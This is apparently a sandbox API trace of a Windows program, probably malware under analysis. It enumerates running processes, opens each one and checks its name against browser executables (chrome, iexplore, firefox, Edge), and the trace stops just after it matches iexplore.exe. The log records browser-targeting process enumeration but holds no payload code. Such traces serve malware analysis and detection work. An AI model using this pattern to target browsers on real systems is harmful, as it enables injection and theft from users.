	[0228.072] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.073] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0228.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.073] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.073] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x62bc
	[0228.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.074] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.075] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.075] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.075] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.076] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0228.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x62c0
	[0228.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.076] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.077] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.077] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.077] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0228.078] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x62c4
	[0228.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.079] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0228.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.079] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.079] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0228.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.080] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.080] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x62c8
	[0228.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.081] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.081] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.081] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.082] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.082] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0228.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x62cc
	[0228.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.083] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0228.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.083] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.084] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0228.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.084] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.084] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0228.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x62d0
	[0228.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.085] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0228.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.085] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.086] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0228.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.086] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.086] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0228.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x62d4
	[0228.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.087] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0228.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.087] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.088] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0228.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.088] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.088] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0228.089] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x62d8
	[0228.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.089] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0228.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.089] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.090] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0228.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.090] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.090] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0228.091] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0228.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0228.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x62dc
	[0228.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.092] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0228.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.093] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.093] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0228.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.094] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.094] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0228.095] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x62e0
	[0228.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.095] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0228.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.095] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.096] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0228.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.096] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0228.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x62e4
	[0228.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.097] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0228.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.097] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.098] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0228.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.098] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.098] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0228.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x62e8
	[0228.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.099] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0228.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.100] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.100] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0228.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.100] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.101] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0228.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x62ec
	[0228.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.101] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0228.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.102] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.103] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0228.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.103] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.103] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0228.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x62f0
	[0228.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.105] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0228.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.105] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.106] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0228.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.106] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.106] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0228.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x62f4
	[0228.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.107] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0228.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.107] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.108] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0228.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.108] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0228.109] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x62f8
	[0228.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.109] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0228.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.110] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.110] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0228.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.111] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.111] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0228.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x62fc
	[0228.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.112] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0228.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.112] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.113] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0228.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.113] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.113] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0228.114] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6300
	[0228.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.114] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0228.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.114] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.115] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0228.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.115] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.115] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0228.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6304
	[0228.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.116] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0228.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.116] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.117] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0228.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.117] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.118] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0228.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6308
	[0228.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.119] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0228.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.119] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.120] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0228.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.120] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0228.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x630c
	[0228.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.122] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0228.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.122] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.123] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0228.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.123] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.124] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0228.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6310
	[0228.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.124] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0228.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.125] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.126] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0228.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.126] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.127] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0228.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6314
	[0228.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.128] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0228.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.128] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.129] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0228.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.129] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0228.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6318
	[0228.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.130] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0228.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.131] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0228.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.131] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
